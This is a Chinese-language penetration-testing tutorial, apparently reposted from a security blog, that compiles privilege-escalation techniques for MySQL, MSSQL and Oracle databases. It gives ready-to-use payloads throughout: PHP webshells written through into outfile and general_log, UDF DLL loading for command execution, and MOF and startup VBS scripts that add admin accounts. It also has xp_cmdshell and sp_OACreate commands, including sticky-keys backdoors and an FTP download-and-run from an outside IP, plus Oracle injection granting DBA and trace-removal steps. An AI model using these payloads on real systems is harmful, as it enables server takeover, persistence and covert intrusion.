乾貨｜各種資料庫提權姿勢總結（建議收藏）

「來源： ｜豬豬談安全 ID：zzt-anquan」

前言

資料庫許可權

在平常的滲透提權中，我們通常可以在一些特殊情況下得到資料庫的使用者名稱和密碼（最高許可權root），如下：

MySQL3306 埠弱口令爆破sqlmap注入的 ——sql-shell 模式網站的資料庫配置檔案中拿到明文密碼資訊CVE-2012-2122等這類漏洞直接拿下 MySQL 許可權

口令爆破、sqlmap的——sql-shell模式和資料庫配置檔案中拿明文密碼已經老生常談了，這裡主要演示一下CVE-2012-2122

CVE-2012-2122

當連線MariaDB/MySQL時，輸入的密碼會與期望的正確密碼比較，由於不正確的處理，會導致即便是memcmp（）返回一個非零值，也會使MySQL認為兩個密碼是相同的。也就是說只要知道使用者名稱，不斷嘗試就能夠直接登入SQL資料庫。按照公告說法大約256次就能夠蒙對一次。

#受影響版本

MariaDB versions from 5。1。62， 5。2。12， 5。3。6， 5。5。23 are not。

MySQL versions from 5。1。63， 5。5。24， 5。6。6 are not。

在vunlub中啟動CVE-2012-2122環境

環境啟動後用docker ps檢視程序

可以看到啟動了一個Mysql服務（版本：5。5。23），監聽埠為3306埠，預設的root使用者的密碼為123456

我們可以使用mysql客戶端進行遠端連線資料庫

連線測試就證明我們的環境正常搭建。然後就是漏洞利用了，正常模擬攻擊者，我們是沒有密碼，不知道root的密碼為123456的，這個時候我們就可以利用CVE-2012-2122來進行身份繞過

msf可以匯出hash值

msf6> use auxiliary/scanner/mysql/mysql_authbypass_hashdumpmsf6> set rhosts 192。168。178。128msf6> run

或者直接bash輸入

root@root：~/桌面# for i in `seq 1 1000`； do mysql -u root ——password=bad -h 192。168。178。128 2>/dev/null； doneWelcome to the MariaDB monitor。 Commands endwith ； or \g。Your MySQL connection id is 854Server version： 5。5。23 Source distribution

Copyright （c） 2000， 2018， Oracle， MariaDB Corporation Ab and others。

Type ‘help；’ or ‘\h’ for help。 Type‘\c’toclear the currentinput statement。

MySQL ［（none）］>

MySQL提權

Webshell許可權

into oufile 寫 shell

into oufile 寫 shell要滿足如下條件才可以寫入

1、知道網站物理路徑2、高許可權資料庫使用者3、load_file（） 開啟 即 secure_file_priv 無限制4、網站路徑有寫入許可權

資料庫檢視是否有secure_file_priv限制

mysql> show global variables like ‘%secure_file_priv%’；+——————————+————-+| Variable_name | Value |+——————————+————-+| secure_file_priv | NULL |+——————————+————-+

在 MySQL 5。5 之前 secure_file_priv 預設是空，這個情況下可以向任意絕對路徑寫檔案

在 MySQL 5。5之後 secure_file_priv 預設是 NULL，這個情況下不可以寫檔案

利用phpmyadmin來into outfile

首先在存在phpmyadmin時，我們可以試試弱口令，root、root來進行登入phpmyadmin後臺。登入進去後我們獲取網站的絕對路徑來進行寫shell

在phpmyadmin中，我們可以利用log變數來猜測網站的絕對路徑

這裡是用phpstudy搭建的網站，所以猜測網站目錄在WWW目錄下，或者透過其他手段的資訊收集，來收集到我們的網站絕對路徑。

有了網站路徑，我們就可以執行SQL命令來進行寫shell

寫入失敗，這裡失敗的原因是因為我們前面查詢secure_file_priv值為null，所以許可權就是不允許匯入或匯出，這裡我們對secure_file_priv進行修改為空後，再進行寫入。

因為secure_file_priv為只讀許可權，所以我們開啟my。ini檔案，加入如下語句再重啟伺服器。

secure_file_priv=‘’

這時檢視許可權為所有目錄下可寫入

再次寫入shell，會發現成功寫入。

然後菜刀、蟻劍進行連線。

當然我麼還可以利用sqlmap進行檔案的寫入，如下：

sqlmap -u “http：//x。x。x。x/？id=x” ——file-write=“c：/Users/suifeng/Desktop/shell。php” ——file-dest=“C：/phpstudy_pro/WWW/shell。php”

當然這種寫shell的方式，在MySQL 5。5之後已經很難實現了，因為MySQL 5。5之後值為NULL，在secure_file_priv沒有匯入匯出許可權的時候，我們還可以利用日誌寫shell。

利用日誌寫shell

在MySQL 5。0 版本以上會建立日誌檔案，我們可以透過修改日誌的全域性變數中的儲存位置來 getshell

mysql> SHOW VARIABLES LIKE ‘%general%’；+——————————+————————————————————————————————-+| Variable_name | Value |+——————————+————————————————————————————————-+| general_log | OFF || general_log_file |C：\phpstudy_pro\Extensions\MySQL5。7。26\data\DESKTOP-1G2NI5V。log |+——————————+————————————————————————————————-+

general_log 預設關閉，高許可權的使用者可以直接透過mysql命令列進行開啟，開啟後日志文件記錄使用者的每條指令，將其儲存在general_log _file中。我們可以透過開啟general_log ，然後自定義general_log _file來進行getshell。

mysql>set global general_log = “ON”； #開啟general_logmysql>set global general_log_file=‘c：/phpstudy_pro/www/shell。php’； #修改general_log_file路徑

再次檢視許可權

#寫入shellmysql> select “<？php @eval（$_POST［‘suifeng’］）；？>”；+——————————————————-+| <？php @eval（$_POST［‘suifeng’］）；？> |+——————————————————-+| <？php @eval（$_POST［‘suifeng’］）；？> |+——————————————————-+

然後蟻劍連線

伺服器許可權

UDF提權

什麼是UDF

UDF（user-defined function）是MySQL的一個拓展介面，也可稱之為使用者自定義函式，它是用來拓展MySQL的技術手段，可以說是資料庫功能的一種擴充套件，使用者透過自定義函式來實現在MySQL中無法方便實現的功能，其新增的新函式都可以在SQL語句中呼叫，就像呼叫一些系統函式如version（）函式便捷。

動態連結庫

提權大致方法是把我們的動態連結庫放置在特點的目錄下，建立我們自定義函式，實現系統函式命令的呼叫，最終導致提權。

在mysql<5。1 匯出目錄c：/windows或system32

在mysql>=5。1 匯出安裝目錄/lib/plugin/

在有注入點時候，我們可以透過sqlmap中裡的UDF動態連結庫進行匯入

#sqlmap中動態連結庫位置D：\tools\sqlmap\data\udf\mysql

裡面有windows和linux且64位和32位版本，大家可以根據被攻擊器來進行選擇

sqlmap中的動態連結庫為了防止被防毒軟體查殺，都經過了編碼處理，不能直接使用，所以我們還需要用sqlmap自帶的解碼工具clock。py進行解碼

#cloak位置D：\tools\sqlmap\extra\cloak#解碼操作D：\tools\sqlmap\extra\cloak>pythoncloak。py-d-id：\tools\sqlmap\data\udf\mysql\windows\64\lib_mysqludf_sys。dll_-olib_mysqludf_sys_64。dll#windows解碼

D：\tools\sqlmap\extra\cloak>pythoncloak。py-d-id：\tools\sqlmap\data\udf\mysql\linux\64\lib_mysqludf_sys。so_-olib_mysqludf_sys_64。so#linux解碼

動態連結庫上傳位置

在上傳動態連結庫之前，我們要先對mysql的版本進行判斷

#判斷資料庫版本mysql> selectversion（）；+——————-+| version（） |+——————-+| 5。7。26 |+——————-+

這裡被攻擊的靶機版本為5。7。26，所以我們要把動態連結庫上傳到安裝目錄/lib/plugin/下面，那我們可以利用如下命令查詢安裝目錄

mysql> show variables like ‘%plugin%’；+————————————————-+——————————————————————————+| Variable_name | Value |+————————————————-+——————————————————————————+| default_authentication_plugin | mysql_native_password || plugin_dir |C：\phpstudy_pro\Extensions\MySQL5。7。26\lib\plugin\ |+————————————————-+——————————————————————————+

mysql> select @@basedir；+————————————————————-+| @@basedir |+————————————————————-+|C：\phpstudy_pro\Extensions\MySQL5。7。26\ |+————————————————————-+

來到對應的目錄下並沒有發現/lib/plugin，所以我們需要自己建立一個/lib/plugin，但是真實環境下我們伺服器許可權還沒有拿下（這裡用是為了觀察直觀），所以我們可以在webshell環境下或者透過NTFS ADS流建立資料夾。

#NTFS ADS流建立語句mysql> select‘x’into dumpfile ‘C：/phpstudy_pro/Extensions/MySQL5。7。26/lib/plugin：：$INDEX_ALLOCATION’； #建立不一定成功，不成功的情況下還是利用webshell的許可權建立目錄

建立好後我們就可以匯入我們的動態連結庫了。

匯入動態連結庫

存在sql注入時

在存在sql注入的時候，我們可以透過sqlmap來上傳動態連結庫，但是需要滿足的條件為secure_file_priv的值為空，sql注入為最高許可權，又因為 GET 有位元組長度限制，所以往往 POST 注入才可以執行這種攻擊。

python sqlmap。py -u “http：//192。168。178。130/sqli-labs/Less-1/？id=1” ——file-write=“d：/tools/sqlmap/extra/cloak/lib_mysqludf_sys_64。dll” ——file-dest=“C：/phpstudy_pro/Extensions/MySQL5。7。26/lib/plugin/lib_mysqludf_sys_64。dll”

不存在sql注入時

沒有sql注入時，我們可以透過執行sql語句來進行寫入動態連結庫，這裡需要寫入檔案，所以需要secure_file_priv為空。

#select後面為動態連結庫的十六進位制編碼（資料太長，這裡省略顯示）SELECT0x4d5a900003。。。 INTODUMPFILE‘C：/phpstudy_pro/Extensions/MySQL5。7。26/lib/plugin/lib_mysqludf_sys_64。dll’；

動態連結庫的十六進位制可以透過mysql自帶的hex函式或者一些檔案十六進位制編碼器工具解決。當然在sql語句寫不進去的動態連結庫的時候，我們還可以透過我們的webshell來進行上傳。

檔案上傳完成後

我們就可以透過sql語句來自定義函數了

#原本執行程式碼CREATEFUNCTION sys_eval RETURNSSTRINGSONAME‘lib_mysqludf_sys_64。dll’；#修改後執行程式碼CREATEFUNCTION sys_eval RETURNSSTRINGSONAME‘udf。dll’；

本來應該執行這條命令來自定義命令的，但是一直報錯，後來我把dll檔名字修改之後，建立成功。（可能是下劃線導致函式在編譯情況下出問題）

#查詢自定義函式mysql> select * from mysql。func；+——————+——-+————-+——————+| name | ret | dl | type |+——————+——-+————-+——————+| sys_eval | 0 | udf。dll | function |+——————+——-+————-+——————+

#建立成功後，我們利用自定義函式進行命令執行mysql > selectsys_eval（‘whoami’）；

然後用我們這個自定義命令執行函式進行提權即可。最後為了許可權維持，防止被發現，我們可以對自定義函式進行刪除。

#刪除自定義函式mysql> drop function sys_eval；

這種手工UDF提權無疑太過繁瑣，這裡主要推薦透過網頁版一鍵提權指令碼，這裡使用的是月師傅的馬，下面是下載地址

連結：https：///s/1a5ASE2TLvnKsOUxsHKBjOw 提取碼：v9s9

上傳後訪問

然後再匯入，執行命令即可

MOF提權

現在透過mof檔案來進行提權已經非常困難了，因為它支援提權版本只有2003和一些之前的版本。mof的提權原理為mof檔案每五秒就會執行，而且是系統許可權，我們透過mysql使用load_file 將檔案寫入/wbme/mof，然後系統每隔五秒就會執行一次我們上傳的MOF。MOF當中有一段是vbs指令碼，我們可以透過控制這段vbs指令碼的內容讓系統執行命令，進行提權。

mof指令碼如下

#pragma namespace（“\\\\。\\root\\subscription”）

instance of __EventFilter as $EventFilter{ EventNamespace = “Root\\Cimv2”； Name = “filtP2”； Query = “Select * From __InstanceModificationEvent ”“Where TargetInstance Isa \”Win32_LocalTime\“ ”“And TargetInstance。Second = 5”； QueryLanguage = “WQL”； }；

instance of ActiveScriptEventConsumer as $Consumer{ Name = “consPCSV2”； ScriptingEngine = “JScript”； ScriptText = “var WSH = new ActiveXObject（\”WScript。Shell\“）\nWSH。run（\”net。exe user suifeng p@ssw0rd /add\“）\nWSH。run（\”net。exe localgroup administrators suifeng /add\“）”； #建立使用者}；

instance of __FilterToConsumerBinding { Consumer = $Consumer； Filter = $EventFilter； }；

首先我們將我們的指令碼上傳，然後用如下命令上傳到指定目錄。

selectload_file（“C：/Documents and Settings/suifeng。mof”） intodumpfile“c：/windows/system32/wbem/mof/suifeng。mof”；

然後等待五秒後用net user命令可以看到建立的使用者

mof提權痕跡清理

因為每隔幾秒鐘時間又會重新執行新增使用者的命令，所以想要清理痕跡得先暫時關閉 winmgmt 服務再刪除相關 mof 檔案

#停止winmgmt服務netstop winmgmt#刪除Repository資料夾rmdir/s /q C：\Windows\system32\wbem\Repository\#重新啟動服務netstart winmgmt

啟動項提權

MySQL的啟動項提權，原理就是透過mysql把一段vbs指令碼匯入到系統的啟動項下，如果管理員啟動或者重啟的伺服器，那麼該指令碼就會被呼叫，並執行vbs腳本里面的命令。

以下是啟動項路徑

#2003C：\Documents and Settings\Administrator\Start Menu\Programs\StartupC：\Documents andSettings\AllUsers\Start Menu\Programs\Startup#2008C：\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupC：\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

有了路徑我們在mysql的shell下輸入如下程式碼

createtable a （cmd text）； insertinto a values （“set wshshell=createobject （”“wscript。shell”“） ” ）； insertinto a values （“a=wshshell。run （”“cmd。exe /c net user suifeng p@ssw0rd /add”“，0） ” ）； insertinto a values （“b=wshshell。run （”“cmd。exe /c net localgroup administrators suifeng /add”“，0） ” ）； select * from a intooutfile“C：\\Documents and Settings\\All Users\\「開始」選單\\程式\\啟動\\a。vbs”；

然後我們在對應路徑下就可以看到我們的vbs指令碼了

然後重啟，即可發現vbs腳本里面建立的使用者。

CVE-2016-6663、CVE-2016-6664組合提權

在一些Mysql小於5。5。51或小於5。6。32或小於5。7。14及衍生版本，我們都可以利用CVE-2016-6663、CVE-2016-6664組合對其進行測試提權。

1、利用CVE-2016-6663將www-data許可權提升為mysql許可權：

cd /var/www/html/gcc mysql-privesc-race。c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient。/mysql-privesc-race test 123456 localhost testdb

2、利用CVE-2016-6664將Mysql許可權提升為root許可權：

wget http：//legalhackers。com/exploits/CVE-2016-6664/mysql-chowned。shchmod 777 mysql-chowned。sh。/mysql-chowned。sh /var/log/mysql/error。log

MSSQL提權

mssql提權前期要做的工作和mysql提權一樣，這裡就不再過多的敘述了，主要介紹一下提權方法。

mssql提權必知基本命令

select @@version#檢視資料庫版本select db_name（） #檢視當前資料庫select IS_SRVROLEMEMBER（‘sysadmin’） #判斷是否為sa許可權select IS_MEMBER（‘db_owner’） #判斷是否為dba許可權exec master。。xp_msver #檢視資料庫系統引數

#開啟xp_cmdshellexec sp_configure ‘show advanced options’， 1；reconfigure；exec sp_configure ‘xp_cmdshell’，1；reconfigure；

#關閉xp_cmdshellexec sp_configure ‘showadvanced options’， 1；reconfigure；exec sp_configure ‘xp_cmdshell’， 0；reconfigure；

#禁用advanced optionsEXEC sp_configure ‘showadvanced options’，0；GO RECONFIGURE；

#sp_OACreate執行命令DECLARE @js intEXEC sp_OACreate ‘ScriptControl’，@js OUTEXEC sp_OASetProperty @js，‘Language’，‘JavaScript’ActiveXObject（“Shell。Users”）；z=o。create（“user”）；z。changePassword（“pass”，“”）；z。setting（“AccountType”）=3；‘

#sp_OACreate移動檔案declare @aa intexec sp_oacreate ’scripting。filesystemobject‘ @aa outexec sp_oamethod @aa， ’moveFile‘，null，’c：\temp\ipmi。log‘，’c：\temp\ipmi1。log‘；

#sp_OACreate複製檔案declare @o intexec sp_oacreate ’scripting。filesystemobject‘， @o outexec sp_oamethod @o，’copyfile‘，null，’c：\windows\explorer。exe‘，’c：\windows\system32\sethc。exe‘；

#sp_OACreate刪除檔案DECLARE @ResultintDECLARE @FSO_Token intEXEC @Result = sp_OACreate ’Scripting。FileSystemObject‘， @FSO_Token OUTPUTEXEC @Result = sp_OAMethod @FSO_Token， ’DeleteFile‘，NULL，’c：\Documents and Settings\All Users\ ［開始］ 選單\程式\啟動\user。bat‘EXEC @Result = sp_OADestrop @FSO_Token

mssql提權必知許可權管理

1。bulkadmin：這個角色可以執行BULK INSERT語句。該語句允許從文字檔案中將資料匯入到SQL Server2008資料庫中，為需要執行大容量插入到資料庫的域帳號而設計。2。dbcreator：這個角色可以建立，更改，刪除和還原任何資料庫。不僅適合助理DBA角色，也可能適合開發人員角色。3。diskadmin：這個角色用於管理磁碟檔案，比如映象資料庫和新增備份裝置。適合助理DBA4。processadmin：SQL Server 2008可以同時多程序處理。這個角色可以結束程序（在SQL Server 2008中稱為“刪除”）5。public：有兩大特點：第一，初始狀態時沒有許可權；第二，所有資料庫使用者都是它的成員6。securityadmin：這個角色將管理登入名及其屬性。可以授權，拒絕和撤銷伺服器級/資料庫級許可權。可以重置登入名和密碼7。serveradmin：這個角色可以更改伺服器範圍的配置選項和關閉伺服器8。setupadmin：為需要管理聯接伺服器和控制啟動的儲存過程的使用者而設計。9。sysadmin：這個角色有權在SQL Server 2008 中執行任何操作。

xp_cmdshell提權

xp_cmdshell的作用類似於mysql的udf，其本質是一些sql語句的集合，xp_cmdshell也可以理解為一些危險性比較高的小指令碼。

xp_cmdshell在mssql2000中開啟，在2005之後就是預設禁止的，我們需要sa許可權來開啟xp_cmdshell

#開啟xp_cmdshellexec sp_configure ’show advanced options‘， 1；reconfigure；exec sp_configure ’xp_cmdshell‘，1；reconfigure；

#關閉開啟xp_cmdshellexec sp_configure ’show advanced options‘， 1；reconfigure；exec sp_configure ’xp_cmdshell‘， 0；reconfigure

在打開了xp_cmdshell之後，我們就可以進行執行命令了

EXEC master。dbo。xp_cmdshell ’whoami‘

sp_OACreate提權

當xp_cmdshell不可用的時候，我們還可以利用sc_oacreate來進行提權

#開啟sc_oacreateEXEC sp_configure ’show advanced options‘， 1； RECONFIGURE WITH OVERRIDE； EXEC sp_configure ’Ole Automation Procedures‘， 1； RECONFIGURE WITH OVERRIDE； EXEC sp_configure ’show advanced options‘， 0；

1）直接加使用者2000系統：declare @shell intexec sp_oacreate ’wscript。shell‘，@shell output exec sp_oamethod @shell，’run‘，null，’c：\winnt\system32\cmd。exe /c net user 123 123 /add‘declare @shell intexec sp_oacreate ’wscript。shell‘，@shell output exec sp_oamethod @shell，’run‘，null，’c：\winnt\system32\cmd。exe /c net localgroup administrators 123/add‘xp和2003系統：declare @shell intexec sp_oacreate ’wscript。shell‘，@shell output exec sp_oamethod @shell，’run‘，null，’c：\windows\system32\cmd。exe /c net user 123$ 123/add‘declare @shell intexec sp_oacreate ’wscript。shell‘，@shell output exec sp_oamethod @shell，’run‘，null，’c：\windows\system32\cmd。exe /c net localgroup administrators 123$ /add‘2）貼上鍵替換declare @o intexec sp_oacreate ’scripting。filesystemobject‘， @o out exec sp_oamethod @o， ’copyfile‘，null，’c：\windows\explorer。exe‘ ，’c：\windows\system32\sethc。exe‘；declare @o intexec sp_oacreate ’scripting。filesystemobject‘， @o out exec sp_oamethod @o， ’copyfile‘，null，’c：\windows\system32\sethc。exe‘ ，’c：\windows\system32\dllcache\sethc。exe‘；需要同時具備sp_oacreate 和sp_oamethod 兩個功能元件3）直接傳馬DECLARE @shell INT EXEC SP_OAcreate ’wscript。shell‘，@shell OUTPUT EXEC SP_OAMETHOD @shell，’run‘，null， ’%systemroot%\system32\cmd。exe /c echo open 222。180。210。113 > cmd。txt&echo 123>> cmd。txt&echo123>> cmd。txt&echo binary >> cmd。txt&echo get 1。exe >> cmd。txt&echo bye >> cmd。txt&ftp -s：cmd。txt&1。exe&1。exe&del cmd。txt。 /q /f&del 1。exe /f /q‘——4）啟動項寫入加賬戶指令碼declare @sp_passwordxieo int， @f int， @t int， @ret intexec sp_oacreate ’scripting。filesystemobject‘， @sp_passwordxieo outexec sp_oamethod @sp_passwordxieo， ’createtextfile‘， @f out， ’d：\RECYCLER\1。vbs‘， 1exec @ret = sp_oamethod @f， ’writeline‘， NULL，’set wsnetwork=CreateObject（“WSCRIPT。NETWORK”）‘exec @ret = sp_oamethod @f， ’writeline‘， NULL，’os=“WinNT：//”&wsnetwork。ComputerName‘exec @ret = sp_oamethod @f， ’writeline‘， NULL，’Set ob=GetObject（os）‘exec @ret = sp_oamethod @f， ’writeline‘， NULL，’Set oe=GetObject（os&“/Administrators，group”）‘exec @ret = sp_oamethod @f， ’writeline‘， NULL，’Set od=ob。Create（“user”，“123$”）‘exec @ret = sp_oamethod @f， ’writeline‘， NULL，’od。SetPassword “123”‘exec @ret = sp_oamethod @f， ’writeline‘， NULL，’od。SetInfo‘exec @ret = sp_oamethod @f， ’writeline‘， NULL，’Set of=GetObject（os&“/123$”，user）‘exec @ret = sp_oamethod @f， ’writeline‘， NULL，’oe。add os&“/123$”‘；5）如果該伺服器有網站，則直接用方法4）寫入一句話

沙盒提權

什麼是沙盒模式？

沙盒模式是資料庫的一種安全功能。在沙盒模式下，只對控制元件和欄位屬性中的安全且不含惡意程式碼的表示式求值。如果表示式不使用可能以某種方式損壞資料的函式或屬性，則可認為它是安全的。

利用條件：

1，Access可以呼叫VBS的函式，以System許可權執行任意命令

2，Access執行這個命令是有條件的，需要一個開關被開啟

3，這個開關在登錄檔裡

4，SA是有許可權寫登錄檔的

5，用SA寫登錄檔的許可權開啟那個開關

6，呼叫Access裡的執行命令方法，以system許可權執行任意命令執行SQL命令，執行了以下命令

開啟預設關閉的xp_regwrite儲存過程：

EXEC master。dbo。xp_regwrite ’HKEY_LOCAL_MACHINE‘，’SoftWare\Microsoft\Jet\4。0\Engines‘，’SandBoxMode‘，’REG_DWORD‘，0

利用jet。oledb執行系統命令新增系統賬號：

select * fromopenrowset（’microsoft。jet。oledb。4。0‘，’；database=c：\windows\system32\ias\dnary。mdb‘，’select shell（“whoami”）‘）

Oracle提權

Oracle許可權分配

系統許可權

系統規定使用者使用資料庫的許可權。（系統許可權是對使用者而言）。

系統許可權分類

DBA： 擁有全部特權，是系統最高許可權，只有DBA才可以建立資料庫結構。

RESOURCE：擁有Resource許可權的使用者只可以建立實體，不可以建立資料庫結構。

CONNECT：擁有Connect許可權的使用者只可以登入Oracle，不可以建立實體，不可以建立資料庫結構。

對於普通使用者：授予connect， resource許可權。

對於DBA管理使用者：授予connect，resource， dba許可權。

實體許可權

某種許可權使用者對其它使用者的表或檢視的存取許可權。（是針對表或檢視而言的）。

實體許可權分類

select， update， insert， alter， index， delete， all //all包括所有許可權

execute //執行儲存過程許可權

Oracle提權方法

透過注入儲存過程提權（低許可權提升至DBA）

原理

SYS建立的儲存過程存在sql注入。擁有create procedure許可權的使用者透過建立提權函式，將提權函式注入到儲存過程中，於是該儲存過程將呼叫這個提權函式來執行grant dba to quan命令，獲得

Oracle資料庫dba許可權

。

利用條件

1、SYS建立的儲存過程存在sql注入（EG：CVE-2005-4832）2、使用者擁有createprocedure許可權（用來建立函式）

提權步驟

假設有一個使用者quan 只有 CONNECT 和 RESOURCE 許可權

手工注入

（1）使用者登陸後執行select * from session_privs檢視許可權

（2）建立函式，命令為grant dba to quan

grant execute on pwn to public；//賦予所有使用者此函式的執行許可權

SQL>create or replace function pwn return vaarchar2authid current_user is pragma autonomous_transaction；beginexecute immediate ’grant dba to quan‘；return’‘；end；/

SQL>grant execute on pwn to public；/（3）注入sys。dbms_cdc_subscribe。activate_subscription

SQL>beginsys。dbms_cdc_subscribe。activate_subscription（’‘’||quan。pwn（）||‘’‘）；end；/

SQL>set role dba；（4）執行select * from session_privs檢視是否為dba許可權

利用MSF注入

（1）載入攻擊模組

use auxiliary/sqli/oracle/dbms_cdc_subscribe。activate_subscription（2）配置引數

set dbuser quan

set dbpass quan123

setsid orcl

set rhost xxxxx

setsqlgrant dba to quan（3）run

2、透過utl_http。request儲存過程提權

原理

Oracle9i~11gR2中dbms_xmlquery。newcontext（）和dbms_xmlquery。getxml（）函式可以執行任意PL/SQL語句，利用這兩個函式可以獲得Oracle伺服器的

作業系統許可權

。

2。2 利用條件

1、UTL_HTTP儲存過程可用2、Oracle9i~11gR2

提權步驟

（1）建立Java包

（2）建立儲存過程MYJAVACMD

（3）執行儲存過程，成功新增使用者